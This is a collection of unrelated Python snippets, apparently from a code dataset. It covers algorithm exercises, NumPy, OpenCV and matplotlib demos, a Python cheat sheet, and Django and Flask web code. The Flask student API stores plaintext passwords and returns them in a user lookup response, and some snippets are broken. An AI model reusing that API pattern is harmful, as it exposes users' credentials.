if val == 'C' and ind+1<len(s) and (s[ind+1] == 'M' or s[ind +1] == 'D'):
ans -= 100
elif val == 'X' and ind+1 <len(s) and (s[ind+1] == 'C' or s[ind+1] == 'L'):
ans -= 10
elif val == 'I' and ind + 1 < len(s) and (s[ind+1] == 'V' or s[ind+1] == 'X'):
ans -= 1
else:
ans += value[val]
return ans
|
from selenium import webdriver
import autogmailpy
import uuid
__author__ = 'Jorge'
driver = webdriver.Firefox()
glogin = autogmailpy.GmailLogin(driver)
glogin.visit_login()
inbox = glogin.fill_in_email().click_next_button().fill_in_password().click_signin_button()
body = '{0}'.format(uuid.uuid4())
inbox.click_compose().fill_email(body=body).send_email().validate_new_email()
inbox.quit()
|
list = []#设一个空列表放所有信息
name_list = []#设一个空列表放所有输入过的信息
count = 0#输入的次数
while True:
if count == 3:#如果输入次数等于三次
break#则跳出循环
dict = {}#设一个空的字典
name = input("请输入名字:")
age = int(input("请输入年龄:"))
sex = input("请输入性别:")
qq = int(input("请输入QQ号:"))
weight = float(input("请输入体重:"))
#给字典赋值
if name not in name_list:#如果输入的名字不在第二个列表记录的名字里
dict["name"] = name
dict["age"] = age
dict["sex"] = sex
dict["qq"] = qq
dict["weight"] = weight
list.append(dict)#将第一个放所有信息的列表放入字典
name_list.append(name)#将第一个列表输入过的名字放入第二个列表并记录
print(list)#打印第一个列表
count+=1
else:#如果输入的名字在第二个列表记录的名字里
print("名字重复!")#则打印重复
age_sum = 0
for i in list:#遍历第一个列表的信息
age_sum = age_sum+i.get("age")
print(i)
print("年龄平均值是:%d"%(age_sum/len(list)))
|
from scheme.interpolation import Interpolator as BaseInterpolator
from scheme.util import recursive_merge
base_interpolator = BaseInterpolator()
class Interpolator(dict):
"""A parameter interpolator."""
def clone(self):
return Interpolator(self)
def evaluate(self, subject):
return base_interpolator.evaluate(subject, self)
def interpolate(self, field, subject):
return field.interpolate(subject, self, base_interpolator)
def merge(self, values):
recursive_merge(self, values)
|
from eval import *
#import eval
import unittest
deploy_path = "models/deploy.prototxt"
weight_caffemodel_path = "models/weight.caffemodel"
labels_csv = "models/labels.csv"
import json
import os
if __name__ == '__main__':
configs = {
"app": "cardapp",
"use_device": "GPU",
"batch_size":1,
"custom_params":{
"thresholds": [0, 0.8, 0.8, 0.8, 0.8, 0.8,0.8]
},
"model_files":{
"deploy.prototxt":deploy_path,
"weight.caffemodel":weight_caffemodel_path,
"labels.csv":labels_csv,
}
}
result_dict,_,_=create_net(configs)
img_path = "examples/images_card/"
img_list = os.listdir(img_path)
reqs=[]
temp_i = 0
for img_name in img_list:
reqs_temp = dict()
reqs_temp["data"]=dict()
reqs_temp["data"]["uri"]=img_path + img_name
reqs_temp["data"]["body"]=None
reqs.append(reqs_temp)
ret = net_inference(result_dict, reqs)
print(ret) |
class Solution(object):
def canPlaceFlower(self, flowerbed, n):
"""
:type flowerbed: List[int]
:type n: int
:rtype: bool
"""
for i,c in enumerate(flowerbed):
if (not c and (i==0 or not flowerbed[i-1])) and (i==len(flowerbed)-1 or not flowerbed[i+1]):
n-=1
flowerbed[i]=1
if n<=0: return True
return not n
def canPlaceFlowers(self, flowerbed, n):
ans = 0
for i, v in enumerate(flowerbed):
if v:
# print v
continue
if i > 0 and flowerbed[i-1]:
# print v
continue
if i< len(flowerbed)-1 and flowerbed[i+1]:# ????why not out of index
print v
continue
ans += 1
flowerbed[i] = 1
return ans >= n
if __name__ == '__main__':
print (Solution().canPlaceFlowers([0,0,0,0,1,0,1,0,0],3)) |
import cv2
img = cv2.imread("jogador.jpg")
(canalAzul, canalVerde, canalVermelho) = cv2.split(img)
print(cv2.split(img))
cv2.imshow("Vermelho", canalVermelho)
cv2.imshow("Verde", canalVerde)
cv2.imshow("Azul", canalAzul)
|
import matplotlib.pyplot as plt # pyplot contains a number of functions that help generate chars and plots.
input_values = [1, 2, 3, 4, 5]
squares = [1, 4, 9, 16, 25] # list to pass it tot he plot ft
plt.style.use('seaborn')
fig, ax = plt.subplots()
ax.plot(input_values, squares, linewidth=3) # make the line thicker, controls the thickness of the line
# Set chart title and label axes
plt.title("Square Numbers", fontsize=24) # Set title for the chart and size of the font.
plt.xlabel("Value", fontsize=14) # Set title to X label
plt.ylabel("Square of Value", fontsize=14) # Set title to Y label
# Set size of tick labels.
plt.tick_params(axis='both', labelsize=14)
plt.show()
|
def stringDisplay():
while True:
s = yield
print(s*3)
c = stringDisplay()
next(c)
c.send('Hi!!')
def nameFeeder():
while True:
fname = yield
print('First Name:', fname)
lname = yield
print('Last Name:', lname)
n = nameFeeder()
next(n)
n.send('George')
n.send('Williams')
n.send('John') |
# lista = ["p", "y", "t", "h", "o", "n"]
#
# for item in lista:
# print (item)
#
# for i in range(5):
# print(i)
import numpy as np
m=[[5,4,7],[0,3,4],[0,0,6]]
a=np.array([[5,4,7],[0,3,4],[0,0,6]])
# print (a)
for item in a:
print (item)
for item in m:
print (item)
|
import numpy as np
x = np.array([[1], [2], [3]])
y = np.array([4, 5, 6])
# 对 y 广播 x
b = np.broadcast(x,y)
# 它拥有 iterator 属性,基于自身组件的迭代器元组
print ('对 y 广播 x:)'
r,c = b.iters
print (r.next(), c.next())
print (r.next(), c.next())
print ('\n' )
# shape 属性返回广播对象的形状
print ('广播对象的形状:')
print (b.shape)
print ('\n' )
# 手动使用 broadcast 将 x 与 y 相加
b = np.broadcast(x,y)
c = np.empty(b.shape)
print ('手动使用 broadcast 将 x 与 y 相加:')
print (c.shape)
print ('\n' )
c.flat = [u + v for (u,v) in b]
print ('调用 flat 函数:')
print (c)
print ('\n' )
# 获得了和 NumPy 内建的广播支持相同的结果
print ('x 与 y 的和:')
print (x + y) |
#!/usr/bin/env python3
# read abelectronics ADC Pi board inputs
# uses quick2wire from http://quick2wire.com/ github: https://github.com/quick2wire/quick2wire-python-api
# Requries Python 3
# GPIO API depends on Quick2Wire GPIO Admin. To install Quick2Wire GPIO Admin, follow instructions at http://github.com/quick2wire/quick2wire-gpio-admin
# I2C API depends on I2C support in the kernel
import quick2wire.i2c as i2c
import time
adc_address1 = 0x68
adc_address2 = 0x69
adc_channel1 = 0x98
adc_channel2 = 0xB8
adc_channel3 = 0xD8
adc_channel4 = 0xF8
# for version 1 Raspberry PI boards use:
# with i2c.I2CMaster(0) as bus:
# for version 2 Raspberry PI boards use:
with i2c.I2CMaster(1) as bus:
def getadcreading(address, channel):
bus.transaction(i2c.writing_bytes(address, channel))
time.sleep(0.001)
h, l, r = bus.transaction(i2c.reading(address,3))[0]
time.sleep(0.001)
h, l, r = bus.transaction(i2c.reading(address,3))[0]
t = (h << 8 | l)
if (t >= 32768):
t = 65536 -t
v = (t * 0.000154 )
if (v < 5.5):
return v
return 0.00
while True:
print ("1: %02f" % getadcreading(adc_address1, adc_channel1))
print ("2: %02f" % getadcreading(adc_address1, adc_channel2))
print ("3: %02f" % getadcreading(adc_address1, adc_channel3))
print ("4: %02f" % getadcreading(adc_address1, adc_channel4))
print ("5: %02f" % getadcreading(adc_address2, adc_channel1))
print ("6: %02f" % getadcreading(adc_address2, adc_channel2))
print ("7: %02f" % getadcreading(adc_address2, adc_channel3))
print ("8: %02f" % getadcreading(adc_address2, adc_channel4))
time.sleep(0.001) |
# БСБО-05-19 Савранский С.
inp = []
while i := input('Line >> '):
inp.append(i)
print(*(f'Line {inp.index(line) + 1}: {line.lstrip()[2:]}\n' for line in inp if '#' in line))
|
from Hearthstone import *
def test_hearthstone():
g = load('replays/2015-01-21-09-14-36.hsrep', save_replay=False)
assert g.effect_pool == []
assert g.minion_counter == 1009
assert g.turn == 9
assert g.aux_vals == deque()
assert g.action_queue == deque()
assert g.minion_pool.keys() == [1000, 1001, 1005, 1006, 1007, 1008]
|
import doctest
import os
import manuel.codeblock
import manuel.doctest
import manuel.testing
from . import testcode
from . import unicode_output
def get_doctest_suite(docnames):
"""Return the doctest suite for specified docnames."""
docnames = [
os.path.join(
os.getcwd(),
doc,
)
for doc in docnames
]
m = manuel.doctest.Manuel(
parser=unicode_output.PermissiveUnicodeDocTestParser(),
optionflags=doctest.ELLIPSIS,
)
m += manuel.codeblock.Manuel()
m += testcode.Manuel()
return manuel.testing.TestSuite(
m,
*docnames
)
|
def may_be_password(number):
number = str(number)
return len(str(number)) == 6 and \
any((a == b for a, b in zip(number, number[1:]))) and \
all((a <= b for a, b in zip(number, number[1:])))
if __name__ == '__main__':
input_range = (138241, 674034)
print(sum((may_be_password(number) for number in range(input_range[0], input_range[1] + 1))))
|
# Listnode.next: always check null
## digit is %
## carry is /
## binary question: "2" divide. mid is 0. mid right is 0 1. so size is still 2. avoid
## while loop完如果要用没有loop也能用的variable,需要保持var跳出while和没进loop的状态一样
## int(x) str(x)
isupper(), islower(), lower(), upper()
a = dict()
a.get(1) -> None a[1] -> KeyError
s.index('@') find (-1)
local_name, domain_name = email.split("@")
chr(ord('A'))
txt = "I like bananas"
x = txt.replace("bananas", "apples")
#dfs:
path.append(reminder)
res.append(path[:]) #copy template
path.pop()
sys.maxint # py2
sys.maxsize # py3
float("-inf") # always work. large
sum = -1 if nums[i] == 0 else 1
abbr[j].isdigit()
a.isalpha()
startswith("xx")
isalnum()
hexa = int(s, base=16)
max([1, 2, 3])
s.strip() #s.lstrip() s.rstrip()
from Queue import Queue # py2
from queue import Queue # py3
self.queue = Queue()
self.queue.get()
self.queue.put(val)
self.queue.qsize()
self.queue.empty()
from collections import deque
a = deque()
queue = deque([root])
a.append(1) # appendleft(1)
a.pop() # popleft()
list(a) # different from queue.Queue()
len(a)
## extend() extendleft()
# list is stack
a = []
a.append(1)
a.extend(list)
a.pop()
a.insert(index, elem)
a = set() # or {1} but not {}. {} is a dict
a.add(1)
a.remove(1) # Raises KeyError
a.discard(1) # if present
# min heap [1,2]
from heapq import heappush, heappop
heappush(heap, item)
heappop(heap)
# heap[0] min
# heappushpop(heap, item) always min heapreplace(heap, item) the min will always out
# lambda
intervals = sorted(intervals, key = lambda x : x.start)
l.sort(key=lambda x: (x.split()[1:], x.split()[0]))
def abc(x):
y,z = x.split(" ")[1:],x.split(" ")[0]
y.append(z)
return y
ll = sorted(ll, key = abc)
max(num, key=sumDigit) max(num, num1, num2, key=len)
A.sort()
a = None or a = set() or a = []
if a:
a = ""
print (not a)
current = dummy = ListNode(-1)
''.join(['a','b','c','d'])
s[::-1] # return new s
''.join(reversed(s))
str.reverse() # not exist
## reversed returns iterator. sorted is okay. print
list(reversed(list))
list.reverse()
list[::-1]
for key in dict:
# py3 its just a view
for key, value in d.items():
dict[a] = dict.get(a, 0) + 1 # value if default
list(a.items()) list(a)
a = "ab"
print (a[5:4]=="") # true
5 // 2
######
A = {}
class Solution:
B = {}
def xx(self):
self.C = {}
def xxx(self):
A
self.B
self.C
#swap
nums[index], nums[nextIndex] = nums[nextIndex], nums[index]
# else 1) range not go in 2) range completes w/o break
for i in range(0,0):
print (1)
break
else:
print (2)
## if range not go in, i is not available
## if break, i is intented
C = [[0] * k for i in range(n)]
letter = 'a' letter * 5 = 'aaaaa'
# for d, r in zip(digit, rom):
for i, j in zip('ABCD', 'xy'):
print (i, j)
# A x, B y
dict: my_dict.pop('key', None)
my_dict.pop('key')
del myDict['key']
https://stackoverflow.com/questions/11520492/difference-between-del-remove-and-pop-on-lists
for set, a.remove(1) # Raises KeyError a.discard(1)
# lists
# del pop index. remove value.
# dictionary
# del pop key.
import random
random.sample(population, k) # without replacement
random.randint(0, 10) #[0, 10]
random.choices(list, k=4)
random.choices(list, k=4)
random.choice(sequence)
# list. comma 分开所有要加到list里的
queue += (x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)
bfs wiki
int (4.8) = 4 print (8/4) = 2.0
print([[]]*5) [[],[],[],[],[]] # but they are all the same (address/refer)
empty_lists = [ [] for i in range(n) ] # better
#content
board[:] = [['XO'[c == 'W'] for c in row] for row in board] # content changed as board is parameter
xxx = board[:] #copy
'abc'.index('a') exception 'abc'.find('a') -1
# string is not mutable!!!
# cannot add mutable stuff to set or dict. tuple is not mutable but list is
# bfs dx dy don't forget to check boundry <0. and while queue, not visited
# iterable (list, tuple, set, dictionary...)
1 in (1,2,3) or 1 in [1,2,3]
#python floor division: 3//-2 = -2
int(3.2) = 3 int(-3.2) = -3 # int(3/-2) to get 3/-2 in java
# split at any space
data.split()
' '.join(bfs_order)
for v in vs: ## dynamic
for i in range(len(vs)) ## static
# You cannot use a list as a key because a list is mutable. ... (You can only
# use a tuple as a key if all of its elements are immutable.)
object() 空对象
用 xxx is not None instead of not xxx (b/c 0 or None?)
method(lst) -> lst[1]=1 or lst.remove() both works
for new_s in (s[:i]+'--'+s[i+2:] for i in range(len(s)-1) if s[i:i+2]=='++'):
for i in range(0):
print('a')
else:
print('b')
# no print(i)
# but b
# string format
f"{to_lowercase(name)} is funny."
ap = collections.defaultdict(list)
def calculateSquare(n):
return n*n
numbers = (1, 2, 3, 4)
result = map(lambda x: 1 if 'e' in x else 0, numbers)
result = map(calculateSquare, numbers)
numbersSquare = set(result)
a = [1,2]
b = [1,2]
a == b
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
try:
raise MyError(2*2)
except MyError as e:
print 'My exception occurred, value:', e.value
# ArithmeticError ValueError(sub IndexError)
traceback.print_exc()
assert ('linux' in sys.platform)
mid = l + ((r - l) >> 1))
a = [1,2]
b = a
a[0] = 100
print (a)
num1 = float(input())
# avoid key error
import collections
self.freq = collections.Counter()
self.group = collections.defaultdict(list)
**var
|
from .models import Backup, Host
from rest_framework import viewsets
from .serializers import BackupSerializer, HostSerializer
class BackupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = Backup.objects.all().order_by('-id')
serializer_class = BackupSerializer
class HostViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Host.objects.all()
serializer_class = HostSerializer
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import User
class AccountUserAdmin(UserAdmin):
list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
'api_secret')
search_fields = ('username', 'first_name', 'last_name', 'email',
'api_secret')
admin.site.register(User, AccountUserAdmin)
|
from django.shortcuts import render, get_object_or_404
from .models import Blog
def all_blogs(request):
blogs = Blog.objects.all()
return render(request, 'blogs/blogs.html', {'blogs': blogs})
def details(request, blog_id):
detail_blog = get_object_or_404(Blog, pk=blog_id)
return render(request, 'blogs/detail.html', {'blog': detail_blog})
def titled_url(request, slog):
detail_blog = get_object_or_404(Blog, title=slog)
return render(request, 'blogs/detail.html', {'blog': detail_blog})
|
from flask import Response, make_response
from flask import render_template, flash, redirect, url_for, request, jsonify, session, g, abort
from app import app, db, lm
from flask_security import auth_token_required
from flask_security import Security, UserMixin, RoleMixin
from flask.ext.login import login_user, logout_user, current_user, login_required
from .forms import LoginForm, RegistrationForm, CreateClassForm
from .models import User, Allclass, Enrollment
# from .models import Quiz, MC_Question, MC_Question_Answer, MC_Question_Options
import json
import ast
import inspect
import uuid
from datetime import date, datetime, time, timedelta
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
@app.before_request
def before_request():
g.user = current_user
###### API CALLS #######
##find all users
@app.route('/api/v1/find/users', methods=['GET'])
def find_user():
show_users = User.query.all()
converted = map(User.to_json, show_users)
return json.dumps(converted)
##get_user with email is DONE
@app.route('/api/v1/users/', methods=['GET'])
def get_user():
json_data = request.json
email_user = json_data['EMAIL']
print email_user
if email_user == None:
users = User.query.all()
converted = map(User.to_json, users)
else:
users = User.query.filter_by(email=email_user).first()
# converted = map(User.to_json, users)
# return json.dumps(converted)
return jsonify({'userName':users.userName,'studentid':users.studentid,
'email':users.email,'password':users.password,
'isProfessor':users.isProfessor})
##post_user with details is DONE
##post_user for Professors with None as studentid DONE
##returns success/no success depending on creation of user
@app.route('/api/v1/users/new', methods=['POST'])
def post_user():
json_data = request.json
user = User(userName=json_data['NAME'],studentid=json_data['ID'],
email=json_data['EMAIL'],password=json_data['PASS'],
isProfessor=json_data['PROF'])
try:
db.session.add(user)
db.session.commit()
status = 'success'
except:
status = 'no success'
db.session.close()
return jsonify({'result':status})
##login_user WORKS return token
@app.route('/api/v1/login', methods=['GET','POST'])
def login_user():
# data = request.data
# data_dict = ast.literal_eval(data)
json_data = request.json
user = User.query.filter_by(email=json_data['EMAIL']).first()
if user and (user.password == json_data['PASS']):
session['logged_in'] = True
user_token = uuid.uuid4()
user.session_token = str(user_token)
db.session.commit()
curr_time = datetime.now()
expr_time = datetime.now() + timedelta(hours=1)
session.permanent = True
app.permanent_session_lifetime = timedelta(hours=1)
print user.userName
print user.isProfessor
print user_token
status = True
return jsonify({'result':status,'isProfessor':user.isProfessor,'token':user_token})
else:
status = False
return jsonify({'result':status})
##logout_user with login token WORKS
@app.route('/api/v1/logout', methods=['POST'])
def logout_user():
json_data = request.json
userToken = json_data['TOKEN']
Curr_users = User.query.filter_by(session_token=userToken)
Curr_users.session_token = None
db.session.commit()
return jsonify({'result': 'logged_out'})
#get_classes with login token WORKS
@app.route('/api/v1/classes', methods=['GET','POST'])
def get_classes():
json_data = request.json
userToken = json_data["TOKEN"]
# print userToken
Curr_users = User.query.filter_by(session_token=userToken).first()
show_classes = Curr_users.enrolled
# print show_classes
converted = map(Allclass.to_json, show_classes)
return json.dumps(converted)
@app.route('/api/v1/testclasses/<token>', methods=['GET'])
def test_classes(token):
Curr_users = User.query.filter_by(session_token=token).first()
show_classes = Curr_users.enrolled
converted = map(Allclass.to_json, show_classes)
return json.dumps(converted)
# return jsonify({'title':Curr_users.enrolled.Allclass.title})
##find_classes DONE without any parameters
@app.route('/api/v1/find/classes',methods=['GET'])
def find_classes():
show_classes = Allclass.query.all()
converted = map(Allclass.to_json, show_classes)
return json.dumps(converted)
# return jsonify({'title':show_classes.title,'semester':show_classes.semester,
# 'callsign':show_classes.callsign, 'CRN':show_classes.CRN,
# 'session':show_classes.session, 'start_time': show_classes.start_time,
# 'end_time':show_classes.end_time})
#post_class WORKS without the only professor logic
@app.route('/api/v1/classes/new', methods=['POST'])
def post_class():
json_data = request.json
# print data_dict
userToken = json_data['TOKEN']
classes = Allclass(title=json_data['TITLE'],semester=json_data['SEMESTER'],
callsign=json_data['CALLSIGN'],CRN=json_data['CRN'],session=json_data['SESSION'],
start_time=json_data['start_time'],end_time=json_data['end_time'])
Curr_users = User.query.filter_by(session_token=userToken).first()
classes.users.append(Curr_users)
db.session.add(classes)
db.session.commit()
return jsonify({'result':'success','title':classes.title})
# else:
# return jsonify({'result':'no success'})
@app.route('/api/v1/classes/quiz/new')
def post_question():
#gets json data
json_data = request.json
#
userToken = json_data['TOKEN']
classCRN = json_data['CRN']
activeQuestion = json_data['ACTIVEQ']
questionText = json_data['TEXT']
options = json_data['CHOICES']
optionsList = options.split('|')
answer = json_data['ANSWER']
Curr_users = User.query.filter_by(session_token=userToken).first()
Curr_class = Curr_class.enrolled.filter_by(CRN=classCRN).first()
Curr_class_id = Curr_class.id
post_Options = MC_Question_Options(questionID=questionNumber,description=whatever)
post_Question = MC_Question()
post_Quiz = Quiz()
|
"""Homework 7 tabs_to_commas for CSE-41273"""
# Yukie McCarter
import csv
import sys
OUTPUT_FILE = "_commas.csv"
def tab_to_comma(in_file, out_file):
with open(in_file) as inputFile:
with open(out_file, 'w') as outputFile:
reader = csv.DictReader(inputFile, delimiter='\t')
writer = csv.DictWriter(outputFile,
reader.fieldnames,
delimiter=',')
writer.writeheader()
writer.writerows(reader)
if __name__ == "__main__":
try:
in_file = sys.argv[1]
if "." in in_file:
out_file = in_file.split('.')[0] + OUTPUT_FILE
tab_to_comma(in_file, out_file)
else:
print("You need a file extention")
except:
pass
|
# Solution of;
# Project Euler Problem 384: Rudin-Shapiro sequence
# https://projecteuler.net/problem=384
#
# Define the sequence a(n) as the number of adjacent pairs of ones in the
# binary expansion of n (possibly overlapping). E. g. : a(5) = a(1012) = 0,
# a(6) = a(1102) = 1, a(7) = a(1112) = 2Define the sequence b(n) = (-1)a(n).
# This sequence is called the Rudin-Shapiro sequence. Also consider the
# summatory sequence of b(n): $s(n) = \sum \limits_{i = 0}^{n} {b(i)}$. The
# first couple of values of these sequences are:n 0 1 2 3 4 5 6 7a(n) 0 0 0 1
# 0 0 1 2b(n) 1 1 1 -1 1 1 -1 1s(n) 1 2 3 2 3 4 3 4The sequence s(n) has the
# remarkable property that all elements are positive and every positive
# integer k occurs exactly k times. Define g(t,c), with 1 ≤ c ≤ t, as the
# index in s(n) for which t occurs for the c'th time in s(n). E. g. : g(3,3) =
# 6, g(4,2) = 7 and g(54321,12345) = 1220847710. Let F(n) be the fibonacci
# sequence defined by:F(0)=F(1)=1 andF(n)=F(n-1)+F(n-2) for n>1. Define
# GF(t)=g(F(t),F(t-1)). Find $\sum$ GF(t) for 2≤t≤45.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 384
timed.caller(dummy, n, i, prob_id)
|
from random import randint
def sorteio(valor):
aleatorio = randint(1,100)
palpite = 1
while valor != aleatorio:
if valor > aleatorio:
print("Informe um valor menor!")
elif valor < aleatorio:
print("Informe um valor maior!")
palpite += 1
valor = int(input("Informe um novo palpite: "))
print(f"Parabéns você acertou o número com {palpite} palpites!")
numero = int(input("Diga um palpite de um número entre 1 e 100: "))
sorteio(numero) |
'''
Uses data from Belfast-Harbour.co.uk/tide-tables to
print the tides that are greater than 3.5 meters
'''
import urllib
import re
url = 'https://www.belfast-harbour.co.uk/tide-tables/'
regexDepth = '<span class="depth">(.+?)</span>' #An array of whatever is between the two span tags
patternDepth = re.compile(regexDepth) #comile into a form that the re library can use
regexDay = '<span class="day">(.+?)</span>'
patternDay = re.compile(regexDay)
regexOrdinal = '<span class="ordinal">(.+?)</span>'
patternOrdinal = re.compile(regexOrdinal)
regexMonth = '<span class="month">(.+?)</span>'
patternMonth = re.compile(regexMonth)
htmlfile = urllib.urlopen(url)
htmltext = htmlfile.read()
# print htmltext
depthArray = re.findall(patternDepth,htmltext)
dayArray = re.findall(patternDay,htmltext)
ordinalArray = re.findall(patternOrdinal,htmltext)
monthArray = re.findall(patternMonth,htmltext)
i=0
j=0
k=0
print "Some of the heights may have the incorrect date because the website that the data comes from has some empty boxes in the table"
while i< 7: #There are 30 days but we only want the first 7
k = 0 #k gets reset to 0 because of each row
while k< 4:
if float(depthArray[j]) >= 3.5 : #if the depth is more than 3.5 meters print it
print dayArray[i] + ordinalArray[i] + " " + monthArray[i] + " " + depthArray[j] + "m" #e.g. 20th August 3.7m
j+=1
k+=1
i+=1
|
import json
import os.path
from collections import Mapping
from pathlib import Path
from typing import List
class RepositoryMap(Mapping):
"""Represents a JSON view of a git repository file structure.
>>> repo_map = RepositoryMap('repo')
>>> repo_map.add_path('path/to/file.txt')
>>> repo_map.add_path('path/to/another_file.txt')
>>> repo_map
<RepositoryMap at 0x1063dc700> JSON: {
"test": [
{
"path": [
{
"to": [
"file.txt",
"another_file.txt"
]
}
]
}
]
}
"""
def __init__(self, repo_name: str, filter_extensions: List[str] = None):
self.repo_name = repo_name
self.filter_extensions = filter_extensions or []
self._repo_map = {self.repo_name: []}
def add_path(self, path: str) -> None:
"""Add a path to the repository map."""
*path_bits, file = Path(path).parts
# Do not add the path if its extension is not listed in allowed extensions
extension = os.path.splitext(file)[1][1:]
if extension not in self.filter_extensions:
return
current_path = self[self.repo_name]
for bit in path_bits:
# Get the first dict which contains a `bit` key.
folder = next(
(folder for index, folder in enumerate(current_path)
if isinstance(folder, dict) and bit in folder),
None
)
if folder is None:
folder = {bit: []}
current_path.append(folder)
current_path = folder[bit]
# Do not add a file if it already exists
if file not in current_path:
current_path.append(file)
def __getitem__(self, key):
return self._repo_map[key]
def __iter__(self):
return iter(self._repo_map)
def __len__(self):
return len(self._repo_map)
def __str__(self):
return json.dumps(
self.as_dict(),
sort_keys=True,
indent=2,
)
def __repr__(self):
return f"<{self.__class__.__name__} at {hex(id(self))}> JSON: {self}"
def as_dict(self) -> dict:
"""Return the repo map as a dictionary.
It can be useful in some cases,
where the :class:`Mapping` is not supported or does not act like a default dict,
but calling a `dict()` function is unwanted due to performance issues.
"""
return self._repo_map.copy()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.